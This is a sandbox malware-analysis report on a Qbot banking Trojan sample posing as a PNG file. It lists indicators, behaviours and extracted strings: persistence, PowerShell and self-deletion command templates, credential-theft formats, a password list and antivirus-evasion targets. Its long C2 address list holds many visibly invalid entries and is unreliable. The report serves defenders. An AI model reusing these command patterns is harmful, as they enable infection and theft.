Malware analysis 444444.png Malicious activity | ANY.RUN

Add for printing

File name:	444444.png
Full analysis:	https://app.any.run/tasks/82a82777-0921-4e2d-a47f-5a4bcc6eb7ec
Verdict:	Malicious activity
Threats:	Qbot is a banking Trojan — a malware designed to collect banking information from victims. Qbot targets organizations mostly in the US. It is equipped with various sophisticated evasion and info-stealing functions and worm-like functionality, and a strong persistence mechanism. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	June 27, 2025, 18:21:48
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	qbot trojan
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32 executable (GUI) Intel 80386, for MS Windows, 4 sections
MD5:	C43367EBAB80194FE69258CA9BE4AC68
SHA1:	D5168670355C872EC98CDF0FE60F8CA563D39305
SHA256:	56EE803FA903AB477F939B3894AF6771AEBF0138ABE38AE8E3C41CF96BBB0F2A
SSDEEP:	6144:+ZKDKl51Cdf40jOmzw4Q1UPUGPr+s7gS/EMUMNiXIJsvSPONZqRur/zN:7uf4bamzlPUGPrRcMjN9JFPiV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- QBOT mutex has been found
  - 444444.png.exe (PID: 2848)
  - explorer.exe (PID: 5808)
- QBOT has been detected (YARA)
  - 444444.png.exe (PID: 2848)
  - explorer.exe (PID: 5808)
- Qbot is detected
  - 444444.png.exe (PID: 2848)
SUSPICIOUS
- Application launched itself
  - 444444.png.exe (PID: 2848)
  - fsoevv.exe (PID: 2128)
- Executable content was dropped or overwritten
  - 444444.png.exe (PID: 2848)
  - cmd.exe (PID: 4844)
- There is functionality for taking screenshot (YARA)
  - 444444.png.exe (PID: 2848)
  - explorer.exe (PID: 5808)
- Starts itself from another location
  - 444444.png.exe (PID: 2848)
- Reads security settings of Internet Explorer
  - 444444.png.exe (PID: 2848)
- Process drops legitimate windows executable
  - cmd.exe (PID: 4844)
- Starts CMD.EXE for commands execution
  - 444444.png.exe (PID: 2848)
- Runs PING.EXE to delay simulation
  - cmd.exe (PID: 4844)
INFO
- The sample compiled with english language support
  - 444444.png.exe (PID: 2848)
  - cmd.exe (PID: 4844)
- Checks supported languages
  - 444444.png.exe (PID: 2848)
  - 444444.png.exe (PID: 4412)
  - fsoevv.exe (PID: 2128)
  - fsoevv.exe (PID: 592)
- Reads the computer name
  - 444444.png.exe (PID: 2848)
  - 444444.png.exe (PID: 4412)
  - fsoevv.exe (PID: 2128)
  - fsoevv.exe (PID: 592)
- Creates files or folders in the user directory
  - 444444.png.exe (PID: 2848)
- Reads security settings of Internet Explorer
  - explorer.exe (PID: 5808)
- Create files in a temporary directory
  - explorer.exe (PID: 5808)
- Process checks computer location settings
  - 444444.png.exe (PID: 2848)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

Qbot

(PID) Process(2848) 444444.png.exe

Botnetspx55

Campaign1579782661

Version324.8

C2 (576)0.0.10.65:25460

0.0.117.110:25460

0.0.169.49:14124

0.0.32.91:12600

0.0.99.111:28259

0.12.44.32:24873

0.128.16.59:32013

0.128.85.32:11570

0.153.233.120:26940

0.17.232.198:63477

0.180.114.119:25444

0.187.212.32:8752

0.195.97.95:29035

0.196.3.188:26989

0.2.64.159:8254

0.226.195.225:15923

0.26.109.109:24433

0.28.226.23:11891

0.40.17.170:10587

0.45.40.44:54318

0.48.49.53:19001

0.83.115.119:594

0.96.0.152:10299

1.0.111.110:28005

1.0.59.3:19887

1.154.8.101:28277

1.29.102.111:29216

1.60.32.43:18035

1.88.3.30:28778

10.125.13.10:29039

10.244.49.22:964

100.101.102.34:15136

100.101.65.116:10345

100.113.108.119:15648

100.121.122.119:29014

100.32.72.1:12131

100.44.32.108:26726

100.59.59.25:41472

100.61.3.144:36955

100.97.197.46:29793

101.0.105.47:10290

101.100.170.133:33045

101.109.40.39:1024

101.120.76.8:30817

101.122.99.40:29505

101.132.80.161:14352

101.168.251.193:46472

101.172.2.254:10049

101.202.154.21:12363

101.40.22.0:12124

101.88.79.98:27237

101.97.110.117:10394

102.106.154.16:37731

102.107.98.117:30823

102.108.111.111:568

102.108.41.123:40625

102.111.177.80:1359

102.92.114.92:28188

103.106.116.99:55809

103.126.27.147:2307

103.128.54.16:14133

103.32.61.153:2695

103.40.97.122:36096

104.105.107.108:28014

104.39.44.113:24420

104.91.161.134:131

104.99.115.113:43085

105.101.181.79:26003

105.108.101.40:50243

105.110.103.46:26226

105.110.146.119:32

105.111.40.88:10507

105.112.119.98:28260

105.116.101.105:29796

105.116.97.192:45316

105.172.18.207:45277

105.43.61.32:13437

105.45.51.93:8286

105.60.66.88:91

105.61.32.48:5642

105.97.97.122:24946

106.101.110.7:4

106.103.100.30:11120

106.29.43.30:18801

106.5.65.29:27165

107.113.97.44:8292

107.120.100.61:8226

107.174.241.70:1590

108.101.0.0:11379

108.101.101.112:10289

108.115.101.32:32826

108.211.26.0:0

108.83.33.20:143

108.99.123.105:2261

109.106.114.100:215

109.112.162.139:29224

109.30.32.38:788

109.9.14.149:5353

109.97.119.104:28527

11.120.14.44:8243

11.178.15.192:9455

110.100.40.250:6151

110.100.64.84:10939

110.119.111.61:576

110.206.103.35:58239

110.234.26.144:39965

110.32.107.115:24439

110.60.60.22:41216

110.93.162.108:10413

111.103.114.97:27972

111.110.116.105:28277

111.116.111.116:31088

111.227.232.224:11058

112.100.105.32:15842

112.101.110.40:8775

112.102.204.101:28543

112.108.105.99:24898

112.111.110.115:25940

112.56.11.60:58129

113.114.115.116:30070

113.119.169.34:41175

113.26.105.114:24577

114.115.40.41:8252

115.0.142.162:22645

115.100.112.99:2560

115.102.118.100:29952

115.108.112.100:27511

115.116.114.133:99

115.116.43.201:19309

115.203.51.72:512

115.41.59.95:63685

115.47.48.120:12592

116.100.61.173:7252

116.106.98.102:30510

116.112.116.119:27248

116.116.112.82:25969

116.117.115.47:12848

116.14.66.72:43041

116.221.27.57:28065

116.95.121.99:256

117.108.95.109:59905

117.114.110.197:53251

117.118.138.11:25132

117.99.41.32:31501

118.105.99.101:8747

118.92.43.188:192

119.120.121.249:322

119.32.2.0:22605

119.32.34.120:28012

119.40.0.0:31078

119.40.49.53:12600

12.20.106.32:11091

120.112.102.104:27751

120.119.102.64:11597

120.196.38.65:12332

120.44.32.111:30830

121.106.88.165:54343

121.107.107.119:10619

121.2.48.10:39524

121.99.118.103:25640

122.167.144.206:18491

122.99.95.105:31089

123.137.157.86:52405

123.224.75.22:15205

123.76.8.50:10

123.97.100.114:25713

125.99.97.116:8454

126.1.128.78:26990

126.102.48.92:8738

126.116.56.57:14644

128.165.121.41:8286

128.199.85.84:11569

128.80.136.32:20577

129.49.56.50:240

13.10.198.177:11622

13.141.195.18:10555

13.40.245.56:56678

130.116.41.32:19301

133.137.174.151:41363

133.60.75.151:55067

134.226.41.246:17779

137.48.14.11:15648

139.177.219.213:1040

139.56.202.63:49701

139.94.205.202:8229

14.124.94.67:28528

14.157.216.67:144

140.151.131.200:35074

141.9.125.4:28788

143.133.77.169:51090

143.254.123.226:34681

145.75.34.211:10076

145.99.142.106:41179

147.117.150.133:889

147.84.82.32:23586

148.164.36.106:8353

148.253.255.113:26699

149.185.175.179:27306

149.226.119.1:36434

15.100.98.107:55946

15.50.15.112:29306

152.254.116.116:27493

154.71.3.1:24722

155.10.116.102:26921

156.18.117.121:29795

158.146.33.40:7168

159.135.128.20:25718

159.151.110.44:8303

16.0.20.99:26740

16.166.232.42:8235

16.28.65.29:5748

160.0.18.51:11313

160.0.44.49:12592

161.18.14.0:6022

163.123.115.103:214

163.173.194.80:2316

164.0.5.45:25185

165.8.40.105:8235

168.248.91.34:9984

168.37.95.221:17137

17.142.5.38:13113

176.18.115.111:29453

176.59.32.121:4283

177.144.250.8:13912

177.195.9.60:60436

177.88.97.76:61440

178.0.111.40:28518

179.40.49.54:10540

179.85.11.205:19745

18.97.44.32:13609

182.101.101.95:28535

186.40.126.98:47134

187.130.103.101:29791

188.68.23.13:11296

192.16.51.93:11296

192.76.43.50:10808

194.16.227.17:15317

195.31.53.49:13513

196.35.143.48:16478

196.43.61.58:17822

197.216.244.91:10978

199.141.10.18:22896

2.1.104.37:13345

2.185.116.105:37125

20.1.44.97:30821

20.13.41.41:8229

20.45.56.8:12596

200.61.43.34:8239

201.98.50.145:8761

202.248.95.233:21158

203.20.112.44:64780

204.161.37.9:12742

204.34.49.49:12345

207.42.1.45:28517

21.58.37.138:32802

213.44.66.217:39486

214.222.99.148:43377

214.87.83.99:29289

215.176.46.69:28278

215.36.112.122:26215

219.59.152.61:40320

220.91.80.69:12915

220.98.242.97:15136

224.160.220.59:37437

224.21.52.32:31777

226.33.15.44:8293

226.93.172.88:47739

227.81.32.165:8232

228.110.114.116:28772

228.5.105.95:12848

228.9.96.69:27437

23.140.0.95:28267

24.32.121.32:49258

240.211.108.161:44575

248.135.202.74:18944

25.95.160.226:26222

250.37.10.100:55040

252.0.45.115:29793

252.213.8.28:23124

27.13.10.150:2823

28.102.122.197:17218

28.122.115.114:68

29.240.35.49:13856

29.54.44.49:13617

29.55.126.172:12

3.11.65.116:10280

32.101.116.67:35028

32.106.32.60:8245

32.119.104.105:22

32.119.115.105:25622

32.125.120.0:2418

32.134.12.133:9839

32.19.46.108:25966

32.214.46.115:49924

32.24.15.95:11069

32.3.21.189:17505

32.34.157.3:9556

32.34.34.212:36668

32.34.43.167:11042

32.34.43.64:456

32.47.32.50:49802

32.47.68.101:27749

32.47.70.0:2166

32.47.84.78:8226

32.48.197.18:12745

32.49.97.113:27247

32.60.232.115:25972

32.61.32.105:25716

32.62.32.34:11144

32.71.91.8:5296

32.97.108.109:25445

33.101.46.38:18576

33.20.26.215:256

33.4.128.208:8752

33.4.92.45:12813

33.80.44.153:34678

34.1.50.64:13173

34.131.113.157:26209

34.134.57.163:22061

34.43.0.24:55688

34.43.10.180:10283

34.43.34.116:28730

34.44.74.129:47657

34.77.83.88:19788

34.92.34.32:12115

34.92.92.34:11044

35.18.77.111:26434

35.192.1.0:35442

35.24.99.34:7760

35.33.183.152:2313

36.156.141.19:54041

37.49.0.0:11314

38.14.107.183:9792

38.16.16.59:15377

38.3.95.49:11898

38.49.184.0:22909

38.55.38.51:50754

38.62.251.137:50043

38.97.32.61:8282

39.150.226.199:16

4.192.82.32:26995

4.23.56.23:12336

4.99.101.108:34594

40.101.41.208:907

40.105.107.100:29030

40.122.110.100:28023

40.125.32.171:34418

40.196.10.246:2627

40.34.5.0:16708

40.34.80.114:28515

40.51.49.45:63493

40.97.227.209:10072

40.98.32.38:45128

41.18.63.232:9782

41.189.46.2:18041

41.29.32.32:384

42.28.122.29:34780

42.32.141.42:13106

42.32.56.80:10313

42.40.44.156:58329

42.47.44.32:10023

43.0.43.46:17784

43.117.120.106:27743

43.206.43.83:29810

43.253.170.224:15148

43.34.115.107:29592

43.34.49.50:13108

43.43.88.152:12297

43.61.32.49:13952

43.64.43.34:11892

44.118.11.42:24617

44.128.142.21:9818

44.135.97.149:11136

44.173.204.227:54230

44.32.101.110:26726

44.32.101.44:8292

44.32.121.99:26977

44.32.45.24:13356

44.49.50.192:62054

44.49.53.48:11314

44.50.53.51:11313

45.106.0.107:3954

45.132.58.0:41624

45.46.114.101:28780

46.112.104.112:44115

46.112.117.115:26765

46.173.64.213:55287

46.44.32.50:12565

46.97.112.112:27769

47.100.60.113:17249

48.120.70.70:10556

48.236.3.7:25328

48.32.63.32:22334

48.41.123.9:3338

48.42.217.138:53504

48.44.52.48:24757

48.93.44.32:29560

48.98.97.173:10292

49.198.24.156:13070

49.29.101.100:31093

49.42.182.0:1354

49.44.0.4:12600

49.48.57.44:12601

49.52.11.0:12332

49.55.56.44:32

5.10.93.62:15922

5.172.44.46:25976

5.182.219.119:23401

5.225.40.28:16135

5.28.44.49:14191

5.30.58.52:2288

50.44.49.49:518

50.44.76.204:5655

50.48.56.51:13363

50.49.54.44:12596

50.49.96.97:14390

50.50.128.55:174

50.50.51.73:12593

51.110.41.196:45487

51.112.103.119:26995

51.44.49.53:14636

51.50.41.120:62721

52.135.102.23:22854

52.32.41.46:29807

52.34.48.0:48574

52.44.50.53:11313

53.45.53.80:222

53.48.48.50:13369

53.51.226.98:8286

53.54.55.56:14689

54.100.107.97:23816

54.33.61.49:13312

54.38.32.48:30790

55.139.66.201:21248

55.51.51.56:14137

55.63.157.93:10062

56.0.124.61:8241

56.226.33.182:3932

56.57.11.16:14135

57.44.128.32:12849

57.44.55.35:12592

57.45.49.21:19020

57.74.53.44:12597

58.52.48.44:3500

59.0.0.21:30305

59.121.11.145:55591

59.205.100.87:33536

59.224.135.33:25121

59.32.43.43:26912

6.0.61.32:28261

6.160.85.13:2569

60.194.175.166:62729

60.199.234.42:54224

60.29.42.91:8222

60.88.221.16:11034

61.113.106.101:12038

61.254.88.89:3584

61.32.39.92:30768

61.32.4.215:19

61.32.40.0:7713

61.32.48.120:13361

61.32.48.59:2304

61.39.169.93:13620

61.44.75.21:44645

62.50.48.44:14358

62.52.241.67:13353

62.62.40.51:12845

64.101.99.104:28448

64.196.115.108:26979

64.42.111.120:26222

64.86.51.50:29548

65.114.114.97:31016

66.46.83.116:29285

66.9.126.174:53406

67.103.40.32:41157

67.114.101.97:2704

67.134.131.3:10337

67.32.79.78:17221

67.40.105.99:24504

67.68.69.70:0

69.76.32.92:8741

7.0.38.105:27763

7.50.9.24:59986

70.114.111.109:7195

70.9.212.20:33504

71.128.15.22:7981

71.168.78.8:16605

71.203.44.25:32947

73.212.113.42:8950

73.74.75.76:19790

76.79.56.193:45358

77.0.0.92:29800

77.105.110.117:30241

77.51.2.20:8775

78.129.108.113:26993

78.90.90.165:19791

79.4.40.100:29795

8.128.18.119:31340

80.111.71.33:29545

80.121.124.40:27396

80.182.166.55:41137

80.33.45.56:13101

80.37.11.172:63660

81.82.83.84:21846

82.114.120.105:29044

82.117.110.40:36908

82.16.46.217:135

82.67.25.110:30060

82.75.101.68:30726

82.85.80.192:29036

83.0.56.51:11314

83.0.83.79:11576

83.101.5.8:29302

83.104.101.108:27694

84.105.22.30:28005

84.29.34.128:7806

85.76.76.24:60028

86.1.52.48:12343

86.120.112.99:26404

87.88.84.90:0

88.0.111.116:28788

88.143.97.28:12316

88.222.78.32:31818

88.232.33.214:15100

9.102.0.128:11054

9.105.102.32:10278

9.13.10.9:2935

9.25.237.32:15392

9.28.205.0:19567

9.54.93.44:8241

9.97.61.226:15136

9.98.66.12:29285

90.61.107.110:0

91.105.93.177:14947

91.105.93.34:129

91.40.108.5:1964

91.49.55.51:12853

91.50.93.126:10767

92.215.14.128:1822

92.39.32.43:8288

92.92.34.226:12141

93.133.18.254:201

93.250.67.134:42

93.41.141.112:11290

93.61.32.77:24948

94.67.242.24:16594

95.0.100.101:27680

95.100.99.115:30820

95.111.108.11:35487

95.32.94.86:3775

96.213.41.32:26209

96.56.53.57:49928

96.84.84.80:8837

97.101.109.120:10296

97.106.118.107:9799

97.109.101.59:1359

97.110.100.111:27944

97.118.101.84:28486

97.39.41.218:56311

98.101.105.121:28791

98.101.32.14:10528

98.104.106.119:41608

98.111.82.212:55257

98.118.98.17:29037

98.122.97.40:31090

98.26.207.161:17098

98.41.59.77:52547

98.44.108.44:34242

98.45.111.40:12481

98.75.128.26:58194

99.104.97.114:17263

99.114.111.115:28518

99.114.118.37:25193

99.152.12.156:34915

99.73.71.122:25951

99.80.72.19:11662

SaltjHxastDcds)oMc=jvh7wdUhxcsdt2

Strings (433)/F

/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"

/ru ""

[begin]

[end]

cookie=[%s]

data=[%s]

exe=[%s] cmdline=[%s] pid=[%u] username=[%s]

ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]

host=[%s:%u] user=[%s] pass=[%s]

referer=[%s]

url=[%s]

url=[%s] data=[%s]

url=[%s] lb=[%s] data=[%s]

url=[%s] user=[%s] pass=[%s]

"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u

"%s\system32\schtasks.exe" /DELETE /F /TN %s

"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S

%%%BOT_NICK%%%

%02u.%02u.%02u-%02u/%02u/%04u

%BOTID%

%BOT_COMPUTERNAME%

%BOT_MACHINE_UUID%

%BOT_USERDOMAIN%

%BOT_USERNAME%

%BOT_VENDOR_ID%

%ProgramFiles%\Internet Explorer\iexplore.exe

%ProgramFiles(x86)%\Internet Explorer\iexplore.exe

%SystemRoot%\SysWOW64\explorer.exe

%SystemRoot%\SysWOW64\mobsync.exe

%SystemRoot%\System32\mobsync.exe

%SystemRoot%\explorer.exe

%s "$windowsupdate = \"%s\"; & $windowsupdate"

%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d

%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%s%s/dupinst.php?n=%s&bg=%s&r=%u

%s\%s.vbs

%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"

%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%u.%s.%s.%08x

*/*

.cfg

.dat

.dll

.exe

.lnk

/bot_serv

/t3

000

123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...

1234567890

23.49.13.33:7000

307

308

309

310

311

ADMIN$

ALLUSERSPROFILE

AdjustTokenPrivileges

Administrator

AllocateAndInitializeSid

AvastSvc.exe

ByteFence.exe

C:\\INTERNAL\\__empty

CWSandbox

CertAddCRLContextToStore

CertAddCTLContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCreateCertificateChainEngine

CertDuplicateCRLContext

CertEnumCertificatesInStore

CertEnumSystemStore

CertFreeCRLContext

CertFreeCertificateChain

CertFreeCertificateChainEngine

CertFreeCertificateContext

CertGetCRLContextProperty

CertGetCertificateChain

CertGetEnhancedKeyUsage

CertGetNameStringW

CertOpenStore

CertSetCertificateContextProperty

CloseHandle

CloseServiceHandle

Content-Type: application/x-www-form-urlencoded

CreateDirectoryA

CreateFileA

CreateFileW

CreateProcessA

CreateProcessW

CreateRemoteThread

CreateServiceW

CreateThread

CreateToolhelp32Snapshot

CreateWindowExA

CredEnumerateA

CredFree

CryptAcquireCertificatePrivateKey

CryptEnumOIDInfo

CryptFindOIDInfo

CryptUnprotectData

DefWindowProcA

DeleteFileA

DeleteService

DeleteServiceW

DeleteUrlCacheEntryW

DestroyWindow

DispatchMessageA

DnsQuery_A

DnsQuery_W

DynamicCodePolicy

ExpandEnvironmentStringsA

FindClose

FindFirstFileA

FindNextFileA

FindWindowA

FreeSid

FtpDeleteFileA

FtpGetFileA

FtpOpenFileA

GenuineIntel

GetClipboardData

GetCurrentDirectoryA

GetCurrentThreadId

GetForegroundWindow

GetMessageA

GetMessageW

GetModuleFileNameA

GetModuleHandleA

GetProcAddress

GetUrlCacheEntryInfoW

GetVolumeInformationA

Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}

HOURLY /mo 5

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoW

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestW

IPC$

Initializing database...

InterlockedCompareExchange

InternetCloseHandle

InternetConnectA

InternetCrackUrlA

InternetGetCookieA

InternetGetCookieExA

InternetGetLastResponseInfoA

InternetOpenA

InternetOpenUrlA

InternetQueryDataAvailable

InternetQueryOptionA

InternetQueryOptionW

InternetReadFile

InternetReadFileExA

InternetSetOptionA

InternetSetStatusCallback

InternetWriteFile

LdrGetProcedureAddress

LdrLoadDll

LoadLibraryA

LocalFree

LookupAccountSidA

LookupAccountSidW

MBAMService.exe

MessageBoxA

Microsoft

MicrosoftEdge.exe

Module32First

Module32Next

MoveFileA

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0

MsMpEng.exe

NAT-PMP %u tcp

NetApiBufferFree

NetGetDCName

NetShareEnum

NetUserEnum

NetWkstaGetInfo

NtAllocateVirtualMemory

NtClose

NtCreateSection

NtFreeVirtualMemory

NtGetContextThread

NtMapViewOfSection

NtProtectVirtualMemory

NtQueryInformationProcess

NtQueryVirtualMemory

NtReadVirtualMemory

NtSetContextThread

NtUnmapViewOfSection

NtWow64QueryInformationProcess64

NtWow64ReadVirtualMemory64

NtWriteVirtualMemory

ObtainUserAgentString

OpenProcess

OpenSCManagerW

OpenThread

PFXExportCertStore

PR_Close

PR_GetError

PR_GetNameForIdentity

PR_OpenTCPSocket

PR_Read

PR_SetError

PR_Write

PStoreCreateInstance

PeekMessageA

PeekMessageW

PostMessageA

PostQuitMessage

Process32First

Process32Next

ProfileImagePath

QEMU

QueryFullProcessImageNameW

Query_Main

RapportGP.DLL

ReadFile

ReadProcessMemory

Red Hat VirtIO

RegCloseKey

RegCreateKeyExA

RegDeleteValueA

RegEnumKeyExA

RegEnumValueA

RegOpenKeyExA

RegQueryInfoKeyA

RegQueryValueExA

RegSetValueExA

RegisterClassExA

RtlGetVersion

RtlNtStatusToDosError

RtlSetLastWin32Error

SAVAdminService.exe;SavService.exe

SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity

SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet

SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\SpyNet

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet

SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet

SbieDll.dll

Self test FAILED!!!

Self test OK.

SendMessageA

Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next

Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)

SetCurrentDirectoryA

SetEndOfFile

SetEntriesInAclA

SetFilePointer

SetLastError

SetNamedSecurityInfoA

ShellExecuteA

ShowWindow

SpyNetReporting

StackWalk64

StartServiceW

SubmitSamplesConsent

TranslateMessage

UnregisterClassA

UpdateWindow

VBoxGuest

VBoxVideo

VMAUDIO

VMware Accelerated

VMware Pointing

VMware Replay

VMware SCSI

VMware SVGA

VMware VMaudio

VMware Vista

VMware server memory

Virtual HD

VirtualAllocEx

VirtualFreeEx

VirtualProtect

VirtualProtectEx

WBJ_IGNORE

WEEKLY /D TUE,WED /ST 12:00:00

WNetAddConnection2W

WNetCancelConnection2W

WNetCloseEnum

WNetEnumResourceW

WNetOpenEnumW

WRSA.exe

WSAConnect

WSAGetLastError

WSASend

WSASetLastError

WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...

WTSEnumerateSessionsW

WTSFreeMemory

WTSQueryUserToken

WaitForSingleObject

Windows10 Edge HttpQueryInfo Bug!!!

WriteFile

WriteProcessMemory

ZwQueryInformationThread

ZwResumeThread

\sf2.dll

aabcdeefghiijklmnoopqrstuuvwxyyz

aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz

abc

abcdefghijklmnopqrstuvwxyz

administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator

advapi32.dll

ansfltr

application/x-shockwave-flash

artifact.exe

aswhooka.dll

aswhookx.dll

avcuf32.dll

avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe

avp.exe

bdagent.exe;vsserv.exe;vsservppl.exe

c:\hiberfil.sysss

cashmanagementconnectionstring

ccSvcHst.exe

chrome.dll

chrome_child.dll

cmd /c schtasks.exe /Query > "%s"

cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\"

cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"

cmd=1&msg=%s&ports=

comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...

connect

content.bigflimz.com

coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe

crypt32.dll

cryptui.dll

cscript.exe

data_after

data_before

data_end

data_inject

dbghelp.dll

dnsapi.dll

egui.exe;ekrn.exe

error res='%s' err=%d len=%u

exclude_url

explorer.exe

firefox.exe

fmon.exe

fshoster32.exe

https://

